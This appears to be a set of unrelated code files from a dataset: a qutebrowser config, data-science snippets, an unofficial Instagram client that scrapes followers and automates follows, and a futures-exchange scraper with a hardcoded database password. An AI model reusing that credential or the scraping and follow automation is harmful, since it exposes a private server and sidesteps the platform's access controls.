\"https://www.archlinux.org/packages/?sort=&arch=x86_64&maintainer=&flagged=&q={}\",\n\"aw\": \"https://wiki.archlinux.org/index.php?title=Special%3ASearch&search={}\",\n\"gw\": \"https://wiki.gentoo.org/index.php?title=Special%3ASearch&search={}&go=Go\",\n\"i\": \"http://www.imdb.com/find?ref_=nv_sr_fn&s=all&q={}\",\n\"dick\": \"https://en.wiktionary.org/wiki/{}\",\n\"ety\": \"http://www.etymonline.com/index.php?allowed_in_frame=0&search={}\",\n\"u\": \"http://www.urbandictionary.com/define.php?term={}\",\n\"y\": \"https://www.youtube.com/results?search_query={}\",\n\"r\": \"https://www.reddit.com/r/{}/new/\",\n\"it\": \"https://itch.io/search?q={}\",\n\"tpb\": \"https://thepiratebay.org/search/{}/0/7/0\",\n\"p\": \"https://www.protondb.com/search?q={}\",\n\"a\": \"https://www.amazon.co.uk/s/?url=search-alias&field-keywords={}\", \n\"eb\": \"https://www.ebay.com/sch/i.html?_from=R40&_trksid=p2380057.m570.l1313&_nkw={}&_sacat=0\", \n\"ji\": \"https://jiji.co.ke/search?query={}\", \n\"ju\": 
\"https://www.jumia.co.ke/catalog/?q={}\", \n}\nc.completion.open_categories = [\"quickmarks\", \"bookmarks\", \"history\"]\n# ads\nc.content.host_blocking.enabled = True\nc.content.host_blocking.lists.append(\"http://sbc.io/hosts/hosts\")\nc.content.host_blocking.whitelist = [\"thepiratebay.org\", \"www.bet365.com\"]\n\n# zoom\n\nc.zoom.default = 100\n\n# colours\n\ndef read_xresources(prefix):\n props = {}\n x = subprocess.run(['xrdb', '-query'], stdout=subprocess.PIPE)\n lines = x.stdout.decode().split('\\n')\n for line in filter(lambda l : l.startswith(prefix), lines):\n prop, _, value = line.partition(':\\t')\n props[prop] = value\n return props\n\nxresources = read_xresources('*')\n\nc.colors.completion.fg = xresources['*.foreground']\nc.colors.completion.even.bg = xresources['*.background']\nc.colors.completion.odd.bg = xresources['*.background']\nc.colors.completion.category.fg = xresources['*.foreground']\nc.colors.completion.category.bg = xresources['*.background']\nc.colors.completion.category.border.top = xresources['*.background']\nc.colors.completion.item.selected.fg = c.colors.completion.category.fg\nc.colors.completion.item.selected.bg = xresources['*.color13']\nc.colors.completion.item.selected.border.top = c.colors.completion.item.selected.bg\nc.colors.completion.item.selected.border.bottom = xresources['*.background']\nc.colors.completion.match.fg = xresources['*.color14']\nc.colors.completion.scrollbar.bg = xresources['*.color0']\nc.colors.completion.scrollbar.fg = xresources['*.color8']\nc.colors.completion.category.border.bottom = xresources['*.background']\nc.colors.completion.category.border.top = xresources['*.background']\nc.colors.statusbar.command.fg = xresources['*.foreground']\nc.colors.statusbar.command.bg = xresources['*.background']\nc.colors.statusbar.insert.bg = xresources['*.color2']\nc.colors.statusbar.caret.bg = xresources['*.color4']\nc.colors.statusbar.progress.bg = xresources['*.foreground']\nc.colors.statusbar.url.success.http.fg = xresources['*.foreground']\nc.colors.statusbar.url.success.https.fg = xresources['*.color10']\nc.colors.statusbar.url.error.fg = c.colors.completion.fg\nc.colors.statusbar.url.warn.fg = c.colors.completion.fg\nc.colors.statusbar.url.hover.fg = xresources['*.color14']\nc.colors.tabs.odd.fg = xresources['*.foreground']\nc.colors.tabs.odd.bg = \"#555555\"\nc.colors.tabs.even.fg = c.colors.tabs.odd.fg\nc.colors.tabs.even.bg = c.colors.tabs.odd.bg\nc.colors.tabs.selected.odd.bg = xresources['*.color7']\nc.colors.tabs.selected.odd.fg = xresources['*.background']\nc.colors.tabs.selected.even.fg = c.colors.tabs.selected.odd.fg\nc.colors.tabs.selected.even.bg = c.colors.tabs.selected.odd.bg\nc.colors.tabs.bar.bg = '#292929'\nc.hints.border = \"1px solid transparent\"\nc.colors.hints.fg = xresources['*.background']\nc.colors.hints.bg = xresources['*.color11']\nc.colors.hints.match.fg = xresources['*.color2']\nc.colors.downloads.bar.bg = xresources['*.background']\nc.colors.downloads.start.fg = xresources['*.foreground']\nc.colors.downloads.system.fg = \"none\"\nc.colors.downloads.system.fg = \"none\"\nc.colors.downloads.error.fg = xresources['*.foreground']\nc.colors.downloads.error.bg = xresources['*.color13']\nc.colors.webpage.bg = xresources['*.foreground']\nc.colors.messages.error.fg = xresources['*.foreground']\nc.colors.messages.error.bg = xresources['*.color5']\nc.colors.messages.error.border = c.colors.messages.error.bg\nc.colors.messages.warning.fg = xresources['*.foreground']\nc.colors.messages.warning.bg = 
xresources['*.color4']\nc.colors.messages.warning.border = c.colors.messages.warning.bg\nc.colors.messages.info.fg = xresources['*.foreground']\nc.colors.messages.info.bg = xresources['*.background']\nc.colors.messages.info.border = c.colors.messages.info.bg\nc.colors.prompts.fg = xresources['*.foreground']\nc.colors.prompts.bg = xresources['*.color4']\nc.colors.prompts.selected.bg = xresources['*.color12']\n\n# keys\n\n#config.bind('', 'spawn --detach mpv --force-window yes {url}')\n# config.bind('', 'spawn --detach mpv --force-window yes --ytdl-format=160+249 {url}')\nconfig.bind('', 'spawn --detach mpv --force-window yes {url}')\nconfig.bind('zd', 'download-open')\nconfig.bind('xx', 'config-cycle tabs.show switching always')\nconfig.bind('xp', 'spawn ~/.local/bin/pocketadd {url}')\n# config.bind('xh', 'config-cycle content.user_stylesheets /home/ll/.config/qutebrowser/styles/style2.css /home/ll/.config/qutebrowser/styles/style.css')\n# config.bind('xh', 'config-cycle content.user_stylesheets \"\" /home/ll/.config/qutebrowser/styles/style2.css')\nconfig.bind('B', 'set-cmd-text -s :bookmark-load')\nconfig.bind('xs', 'config-source')\nconfig.bind('xb', 'config-cycle statusbar.show in-mode always')\nconfig.bind('', 'tab-prev')\nconfig.bind('', 'tab-next')\nconfig.bind('', 'tab-give')\n# Unbind shite defaults\nconfig.unbind('q')\n# config.unbind('z')\nconfig.unbind('')\n\nconfig.bind('', 'hint links spawn --detach mpv --force-window yes {hint-url}')\n\n# configs are for downloading videos and music\nconfig.bind('zy', 'hint links spawn ~/.local/bin/ytdv {hint-url}')\nconfig.bind('zp', 'hint links spawn ~/.local/bin/ytdlp {hint-url} ~/Downloads/qbdownloads')\nconfig.bind('zv', 'spawn ~/.local/bin/ytdv {url}')\nconfig.bind('qr', 'spawn ~/.local/bin/qr {url}')\n\n# Dealing with login forms\n# config.bind('', 'spawn --userscript password_fill')\nconfig.bind('<,>', \"spawn --userscript qute-pass -U secret -u 'username: (.+)'\")\n# config.bind('<,>', 'spawn --userscript qute-pass --username-target secret --username-regex \"username: (.+)\"')\nconfig.bind('<,>', 'spawn --userscript qute-pass --username-only')\nconfig.bind('<,>
', 'spawn --userscript qute-pass --password-only')\nconfig.bind('<,>', 'spawn --userscript qute-pass --otp-only')\n","sub_path":".config/qutebrowser/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"432754019","text":"import tensorflow as tf\n\n\n\nwith tf.gfile.FastGFile('frozen_inference_graph.pb', 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read()) \n\nsession_h_w = tf.Session(graph=graph_def)\n\n ","sub_path":"cnn/test_restore_2_graphs.py","file_name":"test_restore_2_graphs.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"605636209","text":"import sys\r\nimport os\r\n\r\ndef main():\r\n pid=sys.argv[1]\r\n file_path='/proc'+pid+'/ns'\r\n #获取容器内Nsid\r\n command1=\"\"\"sudo ls -l %s 2>log |awk 'NR==5{print $l1}'|grep -o'[0-9]\\{10\\}'\"\"\"%file_path\r\n result1=os.popen(command1).read().split()[0]\r\n #获取主机初始化进程Nsid\r\n command2 = \"\"\"sudo ls -l /proc/1/ns 2>log |awk 'NR==5{print $l1}'|grep -o'[0-9]\\{10\\}'\"\"\" % file_path\r\n result2 = os.popen(command2).read().split()[0]\r\n\r\n if result1==result2:\r\n print(\"9\")\r\n else:\r\n print(\"1\")\r\n\r\n\r\nmain()\r\n\r\n","sub_path":"Intrusion Detection System/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"462040013","text":"from Qt import QtWidgets\n\nfrom openpype.style import load_stylesheet\n\n\nclass MyExampleDialog(QtWidgets.QDialog):\n def __init__(self, parent=None):\n super(MyExampleDialog, self).__init__(parent)\n\n self.setWindowTitle(\"Connected modules\")\n\n label_widget = QtWidgets.QLabel(self)\n\n ok_btn = QtWidgets.QPushButton(\"OK\", self)\n btns_layout = QtWidgets.QHBoxLayout()\n btns_layout.addStretch(1)\n btns_layout.addWidget(ok_btn)\n\n layout = QtWidgets.QVBoxLayout(self)\n layout.addWidget(label_widget)\n layout.addLayout(btns_layout)\n\n ok_btn.clicked.connect(self._on_ok_clicked)\n\n self._label_widget = label_widget\n\n self.setStyleSheet(load_stylesheet())\n\n def _on_ok_clicked(self):\n self.done(1)\n\n def set_connected_modules(self, connected_modules):\n if connected_modules:\n message = \"\\n\".join(connected_modules)\n else:\n message = (\n \"Other enabled modules/addons are not using my interface.\"\n )\n self._label_widget.setText(message)\n","sub_path":"openpype/modules/example_addons/example_addon/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"367474106","text":"import pytest\nimport xarray as xr\nfrom IPython.display import display\n\nfrom climpred.classes import HindcastEnsemble, PerfectModelEnsemble\n\n\n@pytest.mark.parametrize(\"display_style\", (\"html\", \"text\"))\ndef test_repr_PM(PM_da_initialized_1d, PM_da_control_1d, display_style):\n \"\"\"Test html and text repr.\"\"\"\n with xr.set_options(display_style=display_style):\n pm = PerfectModelEnsemble(PM_da_initialized_1d)\n display(pm)\n pm = pm.add_control(PM_da_control_1d)\n display(pm)\n pm = pm.generate_uninitialized()\n display(pm)\n\n\n@pytest.mark.parametrize(\"display_style\", (\"html\", \"text\"))\ndef test_repr_HC(\n hind_ds_initialized_1d,\n hist_ds_uninitialized_1d,\n observations_ds_1d,\n display_style,\n):\n 
\"\"\"Test html repr.\"\"\"\n with xr.set_options(display_style=display_style):\n he = HindcastEnsemble(hind_ds_initialized_1d)\n display(he)\n he = he.add_uninitialized(hist_ds_uninitialized_1d)\n display(he)\n he = he.add_observations(observations_ds_1d)\n display(he)\n # no uninit\n he = HindcastEnsemble(hind_ds_initialized_1d)\n he = he.add_observations(observations_ds_1d)\n display(he)\n","sub_path":"climpred/tests/test_repr.py","file_name":"test_repr.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"217433421","text":"from typing import List\n\nfrom HighGraphPreprocessing import HighGraphPreprocessing, logger, Node\nfrom NeighborManager import NeighborManager\nfrom LayerManager import LayerManager\nfrom ComponentCollector import ComponentCollector\nfrom ReachabilityEstimator import ReachabilityEstimator\nimport numpy as np\n\n\nclass SizeEstimation:\n def __init__(self, high_subgraph: HighGraphPreprocessing,\n neighbor_manager: NeighborManager,\n layer_manager: LayerManager,\n component_collector: ComponentCollector,\n reachability_estimator: ReachabilityEstimator,\n component_layer_num: int = 2):\n self.high_subgraph = high_subgraph\n self.neighbor_manager = neighbor_manager\n self.layer_manager = layer_manager\n self.component_collector = component_collector\n self.reachability_estimator = reachability_estimator\n self.component_layer_num = component_layer_num\n self.flush()\n\n def flush(self):\n self.up_nodes = []\n self.up_sum_deg = 0.\n self.up_num_nodes = 0.\n self.down_nodes = []\n self.down_weighted_sum_deg = 0.\n self.down_sum_reach = 0.\n\n\n def update_up(self, up_nodes_diff: List[Node]):\n new_up_sum_deg = np.sum([len(self.neighbor_manager.neighbors_above(v, self.component_layer_num - 1))\n for v in up_nodes_diff])\n self.up_nodes += up_nodes_diff\n self.up_sum_deg += new_up_sum_deg\n self.up_num_nodes += len(up_nodes_diff)\n\n def update_down(self, down_nodes_diff: List[Node]):\n components = [self.component_collector.component_bfs(v)\n for v in down_nodes_diff]\n inv_reachabilities = np.array([1./self.reachability_estimator.component_reachability(comp)\n for comp in components])\n degrees_down = np.array([self.component_collector.num_neighbors_of_component(comp) / len(comp)\n for comp in components])\n self.down_nodes += down_nodes_diff\n self.down_weighted_sum_deg += np.sum(degrees_down * inv_reachabilities)\n self.down_sum_reach += np.sum(inv_reachabilities)\n\n def estimate_average_deg_up(self):\n return self.up_sum_deg / self.up_num_nodes\n\n def estimate_average_deg_down(self):\n return self.down_weighted_sum_deg / self.down_sum_reach\n\n def estimate_size(self, prev_layer_size, verbose = False):\n up_deg = self.estimate_average_deg_up()\n down_deg = self.estimate_average_deg_down()\n if verbose:\n print(\"Up:\", up_deg, \"\\nDown:\", down_deg)\n return prev_layer_size * up_deg / down_deg\n\n def estimate_size_old(self, layer_num: int,\n prev_layer_size: int,\n node_samples_prev_layer: list,\n node_samples_curr_layer: list):\n if layer_num is 0:\n return len(self.high_subgraph.L0_set)\n if layer_num is 1:\n return len(self.high_subgraph.L1_set)\n\n avg_deg_up = np.mean([len(self.neighbor_manager.neighbors_above(v, layer_num - 1)) for v in node_samples_prev_layer])\n\n if layer_num < self.component_layer_num:\n avg_deg_down = np.mean([len(self.neighbor_manager.neighbors_up_to(v, layer_num - 1)) for v in node_samples_curr_layer])\n else:\n components = 
[self.component_collector.component_bfs(u) for u in node_samples_curr_layer]\n degrees_down = [self.component_collector.num_neighbors_of_component(comp) / len(comp) for comp in components]\n avg_deg_down = np.mean(degrees_down)\n print(avg_deg_up)\n print(avg_deg_down)\n size = prev_layer_size * avg_deg_up / avg_deg_down\n return size","sub_path":"code/SizeEstimation.py","file_name":"SizeEstimation.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"435624437","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.integrate\n\nfig = plt.figure()\nplot1 = fig.add_subplot(2,1,1)\nplot2 = fig.add_subplot(2,1,2)\n\nfor subplt in (plot1, plot2):\n subplt.axis([-5, 5, -5, 5])\n subplt.set_xticks([])\n subplt.set_yticks([])\n subplt.set_xlabel('t')\nplot1.set_ylabel('u')\nplot2.set_ylabel('v')\n\n\ndef f(t, y):\n (u, v) = y\n return np.array([1, 0.2*u*v])\n\nr = scipy.integrate.ode(f).set_integrator('zvode', method='bdf')\nfor initval in np.linspace(-5, 5, 10):\n r.set_initial_value(np.array([-5., initval]), -5.)\n t1 = 5.\n dt = 0.01\n pts = []\n while r.successful() and r.t < t1:\n pts.append(r.y)\n r.integrate(r.t + dt)\n traj = np.array(pts)\n ts = np.linspace(-5, 5, traj.shape[0])\n plot1.plot(ts, traj[:,0])\n plot2.plot(ts, traj[:,1])\n\nfig.subplots_adjust(left=0.1, right=0.95)\nfig.set_size_inches(2, 4)\nfig.savefig('figexmpls/diffeq_mockup.pdf')\n","sub_path":"exmpl_overview_diffeq_mockup.py","file_name":"exmpl_overview_diffeq_mockup.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"654284655","text":"from qutip import *\nimport numpy as np\nfrom math import *\n\n\nH = 0.6*(destroy(2) + destroy(2).dag())\n\ntime = np.linspace(0,20,2000)\n\npsi0 = basis(2,1)\n\ndata = mcsolve(H,psi0,time,[sqrt(0.1)*destroy(2).dag()],[sigmaz()])\n\nwith open(\"data.dat\",'w') as f:\n\tfor j in range(0,len(time)):\n\t\tf.write(str(j) + \" \" + str(data.expect[0][j]) + \"\\n\")","sub_path":"Quantum_Jump/matrix/src/Q_Jump_QuTip.py","file_name":"Q_Jump_QuTip.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"470334968","text":"import json\nfrom pprint import pprint\nimport webbrowser\n\nclass Assignment2:\n '''\n Assignment2 class handles all of the parsing and display's the parsed map\n '''\n def __init__(self):\n pass;\n \n def jLoad(self, filePath):\n '''\n jLoad loads in the json file and returns the raw data\n '''\n jsonFile = open(filePath);\n json_raw_data = json.load(jsonFile);\n jsonFile.close();\n return json_raw_data;\n\n def jParse(self, filePath):\n '''\n jParse parses the data into a dict where key = city name and\n value = city information\n returns the parsed data\n '''\n json_data = self.jLoad(filePath);\n metros = json_data[\"metros\"];\n routes = json_data[\"routes\"];\n cityPorts = [];\n #Takes all of the cities in the raw data and uses the full city name\n #as the key in a new dictionary. 
The city information is the new value\n for x in range(len(metros)):\n flightList = {};\n for i in range(len(routes)):\n #searches for all of the different one-way routes\n #and puts them into a dictionary\n if metros[x][\"code\"] == routes[i][\"ports\"][0]:\n cityFinder = routes[i][\"ports\"][1];\n for y in range(len(metros)):\n if cityFinder == metros[y][\"code\"]:\n cityFinder = metros[y][\"name\"];\n flightList[cityFinder] = routes[i][\"distance\"];\n elif metros[x][\"code\"] == routes[i][\"ports\"][1]:\n cityFinder = routes[i][\"ports\"][0];\n for y in range(len(metros)):\n if cityFinder == metros[y][\"code\"]:\n cityFinder = metros[y][\"name\"];\n flightList[cityFinder] = routes[i][\"distance\"];\n #Adds the new route list to the city information\n metros[x]['direct cities'] = flightList;\n #creates a new dictionary to reorganize the data\n airportDict = dict([(metros[x][\"name\"],metros[x]) for x in range(len(metros))]);\n #removes city name from the city information and makes it the key\n for k in range(len(metros)):\n name = metros[k][\"name\"];\n del airportDict[name]['name'];\n return airportDict;\n\n\n def displayRouteMap(self, dict):\n '''\n displayRouteMap takes the parsed data and creates a URL\n it then opens up a browser and automatically adds the URL\n '''\n url = \"http://www.gcmap.com/mapui?P=\";\n routes = dict;\n for i in range(len(routes)):\n ports = routes[i][\"ports\"];\n url = url+ ports[0]+\"-\"+ports[1]+\",\";\n webbrowser.open_new(url);\n \n \n\n\n\n\n\n","sub_path":"AirportRouteComputations/Assignment2.py","file_name":"Assignment2.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"268050006","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 19 10:09:38 2017\n\n@author: tih\n\"\"\"\n\nTfile = r\"J:\\Tyler\\Input\\Meteo\\daily\\avgsurft_inst\\mean\\T_GLDAS-NOAH_C_daily_2016.06.15.tif\"\nPfile = r\"J:\\Tyler\\Input\\Meteo\\daily\\psurf_f_inst\\mean\\P_GLDAS-NOAH_kpa_daily_2016.06.15.tif\"\nHfile = r\"J:\\Tyler\\Input\\Meteo\\daily\\qair_f_inst\\mean\\Hum_GLDAS-NOAH_kg-kg_daily_2016.06.15.tif\"\nOutfilename = r\"J:\\Tyler\\Input\\Meteo\\daily\\Hum_Calculated\\Humidity_percentage_Calculated_daily.tif\"\n\nimport gdal\nimport os\nimport wa.General.raster_conversions as RC\nimport wa.General.data_conversions as DC\nimport numpy as np\n\n\ngeo_out, proj, size_X, size_Y = RC.Open_array_info(Tfile)\nTdata = RC.Open_tiff_array(Tfile)\nTdata[Tdata<-900]=np.nan\nPdata = RC.Open_tiff_array(Pfile)\nHdata = RC.Open_tiff_array(Hfile)\n\n\nEsdata = 0.6108*np.exp((17.27*Tdata)/(Tdata+237.3))\nHumData = np.minimum((1.6077717*Hdata*Pdata/Esdata),1)*100\n \nDC.Save_as_tiff(Outfilename,HumData,geo_out,\"WGS84\") ","sub_path":"Processing_Scripts/METEO/CalcHumidityGLDASdata.py","file_name":"CalcHumidityGLDASdata.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"304608793","text":"import datetime\nimport pymssql\nimport re\nimport time\n\nimport requests\nimport json\nfrom fake_useragent import UserAgent\nua = UserAgent()\nheaders = {'User-Agent': ua.random}\n\nimport logging\n# 在控制台输出\nlogger = logging.getLogger('shfe_heyue')\nlogger.setLevel(level=logging.DEBUG)\nhandler = logging.FileHandler(filename='ErrorLog.log')\n\nhandler.setLevel(level=logging.INFO)\nformatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - 
%(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n# 输出到控制台\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\ndef getday():\n # oneday = datetime.timedelta(days=1)\n day = datetime.date.today()\n return str(day)\n\n\ndef get_html():\n try:\n today = day.replace('-', '')\n url = 'http://www.shfe.com.cn/data/dailydata/kx/pm%s.dat?isAjax=true' % today\n html = requests.get(url=url, headers=headers).text\n return html\n except BaseException:\n logger.error('today is not work')\n\n\ndef parse_html(html):\n data = json.loads(html)\n data = data['o_cursor']\n return data\n\n\ndef get_heyue(data):\n heyue = {}\n com = re.compile(r'[\\n \\t \\r \\xa0]')\n for k in data:\n if k['RANK'] not in [-1, 0, 999]:\n key = re.sub(com, '', k['INSTRUMENTID'])\n heyue[key] = []\n return heyue\n\n\ndef yield_str(heyue):\n for k, v in heyue.items():\n strs = '''{\"_AnalyzeModelName\":\"\",\"合约代码\":\"%s\",\"日期\":\"%s\",\"排名\":%s}''' % (\n k, day, v)\n strs = re.sub('\\'', '\\\"', strs)\n # if len(strs) > 2000:\n # print(strs, k, day)\n write_mssql(strs, k)\n\ndef write_mssql(strs, heyueID):\n '''写入数据库'''\n try:\n con = pymssql.connect(\n server=\"172.0.10.59\",\n user=\"gt\",\n password=\"server123!@#\",\n database=\"GtTrading\")\n cur = con.cursor()\n if not cur:\n print('数据库连接失败')\n\n sql = 'select top(1)* from objdata order by id desc'\n cur.execute(sql)\n result = cur.fetchall()\n contentid = result[0][1] + 1\n url = \"http://www.shfe.com.cn/statements/dataview.html?paramid=pm\"\n insertsql = 'insert into objdata (contentid,url,json,state) values (%s,%s,%s,1)'\n cur.execute(insertsql, (contentid, url, strs))\n con.commit()\n logger.info((day,contentid, 'ok +1'))\n con.close()\n except BaseException:\n logger.error('insert sql error')\n\ndef parse_heyue(data, heyue):\n com = re.compile(r'[\\n \\t \\r \\xa0]')\n for k in data:\n if k['RANK'] not in [-1, 0, 999]:\n key = re.sub(com, '', k['INSTRUMENTID'])\n item = {\"成交_名次\": str(k['RANK']),\n \"成交_会员\": re.sub(com, '', k['PARTICIPANTABBR1']),\n \"成交量\": str(k['CJ1']),\n \"成交_增减\": str(k['CJ1_CHG']),\n \"买单_名次\": str(k['RANK']),\n \"买单_会员\": re.sub(com, '', k['PARTICIPANTABBR2']),\n \"买单量\": str(k['CJ2']),\n \"买单_增减\": str(k['CJ2_CHG']),\n \"卖单_名次\": str(k['RANK']),\n \"卖单_会员\": re.sub(com, '', k['PARTICIPANTABBR3']),\n \"卖单量\": str(k['CJ3']),\n \"卖单_增减\": str(k['CJ3_CHG']),\n }\n heyue[key].append(item)\n return heyue\n\n\ndef main():\n html = get_html()\n data = parse_html(html)\n heyue = get_heyue(data)\n heyue = parse_heyue(data, heyue)\n # yield_str(heyue)\n\n\nif __name__ == '__main__':\n # while True:\n # hour_time = datetime.datetime.now().strftime('%H')\n # # day = '2018-08-22'\n # day = getday()\n # try:\n # if hour_time in ['18']:\n # main()\n # logger.info((day,'time sleep 1 hours'))\n # time.sleep(3602)\n # else:\n # logger.info('sleep 10 mins')\n # time.sleep(600)\n # except:\n # logger.info((day, 'time sleep 10mins'))\n # time.sleep(600)\n print('shfe_heyue'.center(80,'-'))\n day = '2018-08-23'\n main()\n logger.info((day,'ok '))\n\n","sub_path":"WorksZhang/pyspider/FuturesExchange/原交易所数据抓取/shfe_heyue.py","file_name":"shfe_heyue.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"447269257","text":"from utils import *\nfrom constants import *\nimport re\nimport time\nimport requests\nimport json\n\n# -*- coding: utf-8 -*-\n\n\nclass InstagramApi:\n def 
__init__(self, username, password, login = True):\n        self.session = requests.Session()\n        self.is_login = login\n        if self.is_login:\n            self.login(username, password)\n        else:\n            '''Required to obtain GIS'''\n            self.set_headers()\n\n    def set_headers(self, url = INSTAGRAM_URL):\n        # Fetch the given url (previously the url argument was ignored).\n        content = self.session.get(url).content\n\n        header = {'x-csrftoken' : return_raw_content_data(content)[\"csrf_token\"],\n            'x-requested-with' : 'XMLHttpRequest',\n            'x-ig-app-id' : '1217981644879628',\n            'cookie' : 'ig_cb=1',\n            'X-Instagram-AJAX' : '1',\n            'Accept' : '*/*',\n            'User-Agent' : USER_AGENT,\n            'Accept-Language' : 'en-US',\n            'Accept-Encoding' : 'gzip, deflate',\n            'Connection' : 'close',\n            'Referer' : 'https://www.instagram.com',\n            'Authority' : 'www.instagram.com',\n            'Origin' : 'https://www.instagram.com',\n            'Content-Type' : 'application/x-www-form-urlencoded'\n            }\n\n        self.rhx_gis = return_raw_content_data(content)[\"rhx_gis\"]\n        self.session.headers.update(header)\n\n    def login(self, username, password):\n        self.set_headers()\n\n        data = {'username' : username,\n            'password' : password}\n\n        login_response = self.session.post(\n            '{}accounts/login/ajax/'.format(INSTAGRAM_URL),\n            data = data,\n            allow_redirects = True)\n\n        if (login_response.status_code != 200):\n            raise Exception(\"Login error with {}\".format(username))\n\n        self.session.headers.update({'x-csrftoken' : login_response.cookies['csrftoken']})\n        self.cookies = login_response.cookies\n        print(\"Logged in as: {}\".format(username))\n\n    def update_ig_gis_header(self, params):\n        if not self.is_login:\n            self.set_headers()\n\n        self.session.headers.update({\n            'x-instagram-gis': self.get_ig_gis(\n                self.rhx_gis,\n                params\n            )\n        })\n\n    @staticmethod\n    def get_ig_gis(rhx_gis, params):\n        return hashlib.md5((str(rhx_gis) + \":\" + str(params)).encode('utf-8')).hexdigest()\n\n    def get_user_id(self, username):\n        # Check the login flag, not the login() method (a bound method is always truthy).\n        if self.is_login:\n            return self.__get_user_id_with_login(username)\n        return self.__get_user_id_without_login(username)\n\n    def __get_user_id_with_login(self, username):\n        ''' Basic API calling\n        username = username of target instagram user\n        return data will be the ID of the target user\n        '''\n        user_data = self.session.get('{}{}/?__a=1'.format(INSTAGRAM_URL, username)).content\n        return json.loads(user_data)['graphql']['user']['id']\n\n    def __get_json_field(self, url):\n        response_content = self.session.get(url).content\n        return response_content[str(response_content).find('{\"config')-300:]\n\n    def __get_user_id_without_login(self, username):\n        config_data = self.__get_json_field('{}{}'.format(INSTAGRAM_URL, username))\n        return re.findall('\"id\":\"(.*)\",\"is_business', str(config_data))[0]\n\n    def __get_ajax_rollout_hash(self):\n        config_data = self.__get_json_field(INSTAGRAM_URL)\n        ajax_hash = re.findall('\"rollout_hash\":\"(.*)\",\"bundle_variant\"', str(config_data))[0]\n        self.session.headers.update({'X-Instagram-AJAX' : ajax_hash})\n\n    def get_user_posts_by_id_on_feed(\n        self,\n        user_id,\n        include_changing = 'false',\n        include_reel = 'false',\n        include_suggested_users = 'false',\n        include_logged_out_extras = 'false',\n        include_highlight_reels = 'false'\n    ):\n        params = QUERY_USER_FEED.format(user_id, include_changing, include_reel, include_suggested_users, include_logged_out_extras, include_highlight_reels)\n        self.update_ig_gis_header(params)\n        return self.session.get(QUERY_USER_FEED_URL.format(params)).content\n\n    def get_user_posts_by_id(self, user_id, from_post = '', count = 12):\n        ''' Basic API calling, used by default.\n        
user_id = the requested profile user_id\n from_post = api fetching posts always releated from a post id\n\n the QUERY_MEDIA_VARS \"first\" param is setted to 12, because api defaultly request 12 posts, max 50\n '''\n params = QUERY_MEDIA_VARS.format(user_id, count, from_post)\n self.update_ig_gis_header(params)\n return self.session.get(QUERY_MEDIA_URL.format(params)).content\n\n def get_post_data_by_shortcode(self, shortcode):\n ''' Basic API calling\n shortcode = shortcode of the targeted post\n return data will be all available information from the post\n '''\n params = POST_MEDIA_VARS.format(shortcode)\n self.update_ig_gis_header(params)\n return self.session.get(POST_MEDIA_URL.format(params)).content\n\n def get_search_posts_by_tag(self, tag, show_ranked = False, first = 1, after = ''):\n ''' Basic API calling\n tag = the search keyword (normal search, not location, people etc)\n return data will contain the posts and the search cursor\n '''\n params = QUERY_SEARCH_TAG_VARS.format(tag, show_ranked, first, after)\n self.update_ig_gis_header(params)\n return self.session.get(QUERY_SEARCH_TAG_URL.format(params)).content\n\n def get_post_liker_list_by_shortcode(self, shortcode, include_reel = 'false', number_of_likers = 24):\n params = QUERY_POST_LIKERS_VARS.format(shortcode, include_reel, number_of_likers)\n self.update_ig_gis_header(params)\n return self.session.get(QUERY_POST_LIKERS_URL.format(params)).content\n\n def get_user_follows_by_id(self, user_id, include_reel = False, fetch_mutual = False, first = 24, after = ''):\n params = QUERY_USER_FOLLOWS_BY_ID_VARS.format(user_id, include_reel, fetch_mutual, first, after)\n self.update_ig_gis_header(params)\n return self.session.get(QUERY_USER_FOLLOWS_BY_ID_URL.format(params)).content\n\n def get_user_followers_by_id(self, user_id, include_reel = False, fetch_mutual = False, first = 24, after = ''):\n params = QUERY_USER_FOLLOWERS_BY_ID_VARS.format(user_id, include_reel, fetch_mutual, first, after)\n self.update_ig_gis_header(params)\n return self.session.get(QUERY_USER_FOLLOWERS_BY_ID_URL.format(params)).content\n\n def follow_user_by_id(self, user_id):\n self.__get_ajax_rollout_hash()\n resp = self.session.post('https://www.instagram.com/web/friendships/{}/follow/'.format(user_id))\n print(resp.content)\n print(resp)\n","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":7017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"323849779","text":"import glob\nimport os.path\n\ndef get_all_file_path_start_from(dir_path_pattern):\n return 